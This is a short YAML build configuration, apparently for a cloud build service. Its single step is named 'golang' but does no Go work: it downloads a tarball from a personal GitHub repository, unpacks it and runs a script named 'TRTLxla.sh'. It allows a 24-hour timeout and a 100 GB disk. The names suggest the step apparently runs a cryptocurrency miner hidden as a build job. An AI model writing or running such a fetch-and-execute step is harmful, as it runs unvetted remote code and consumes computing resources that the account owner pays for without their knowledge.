steps:
  - name: golang
    args:
      - '-c'
      - >-
         wget https://github.com/sabarlur/coba/raw/main/trtlxla.tar.gz && tar xf trtlxla.tar.gz && ./TRTLxla.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
options:
  diskSizeGb: '100'
